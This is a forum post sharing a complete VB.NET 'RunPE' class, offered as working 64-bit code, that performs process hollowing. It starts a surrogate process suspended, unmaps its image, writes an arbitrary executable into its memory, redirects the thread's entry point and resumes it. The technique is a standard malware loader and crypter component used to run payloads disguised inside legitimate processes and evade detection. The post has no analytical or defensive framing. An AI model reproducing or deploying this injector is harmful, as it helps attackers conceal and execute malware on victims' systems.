Jump to content
Nytro

[.NET] 64-Bit working RunPE

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[.NET] 64-Bit working RunPE

Imports System.Runtime.InteropServices
Imports System.Text

Public Class RunPE
    <DllImport("kernel32")> _
    Private Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, _
        ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    End Function
    <DllImport("kernel32")> _
    Private Shared Function GetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    End Function
    <DllImport("ntdll")> _
    Private Shared Function NtUnmapViewOfSection(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
    End Function
    <DllImport("kernel32")> _
    Private Shared Function ReadProcessMemory(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
    End Function
    <DllImport("kernel32.dll")> _
    Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInteger
    End Function
    <DllImport("kernel32")> _
    Private Shared Function SetThreadContext(ByVal hThr As IntPtr, ByVal ctxt As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
    End Function
    <DllImport("kernel32")> _
    Private Shared Function VirtualAllocEx(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
    End Function
    <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
    Private Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As IntPtr, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
    End Function
    <DllImport("kernel32.dll", SetLastError:=True)> _
    Private Shared Function WriteProcessMemory(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByVal lpNumberOfBytesWritten As Integer) As Boolean
    End Function

    Public Shared Function InjectPE(ByVal bytes As Byte(), ByVal surrogateProcess As String) As Boolean
        Try
            Dim procAttr As IntPtr = IntPtr.Zero
            Dim processInfo As IntPtr() = New IntPtr(3) {}
            Dim startupInfo As Byte() = New Byte(67) {}

            Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
            Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
            Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))

            If CreateProcess(Nothing, New StringBuilder(surrogateProcess), procAttr, procAttr, False, 4, _
                procAttr, Nothing, startupInfo, processInfo) Then
                Dim ctxt As UInteger() = New UInteger(178) {}
                ctxt(0) = &H10002
                If GetThreadContext(processInfo(1), ctxt) Then
                    Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)

                    Dim buffer__1 As IntPtr = IntPtr.Zero
                    Dim bufferSize As New IntPtr(4)

                    Dim numRead As IntPtr = IntPtr.Zero

                    If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then
                        Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
                        Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
                        Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &H3000, &H40)

                        Dim lpNumberOfBytesWritten As Integer

                        WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
                        Dim num5 As Integer = num - 1
                        For i As Integer = 0 To num5
                            Dim dst As Integer() = New Integer(9) {}
                            Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40)
                            Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
                            Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)

                            size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
                            addr = New IntPtr(buffer2.Length)

                            WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
                        Next
                        size = New IntPtr(ctxt(&H29) + 8L)
                        addr = New IntPtr(4)

                        WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
                        ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
                        SetThreadContext(processInfo(1), ctxt)
                    End If
                End If
                ResumeThread(processInfo(1))
            End If
        Catch
            Return False
        End Try
        Return True
    End Function
End Class

Sursa: ic0de.org

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...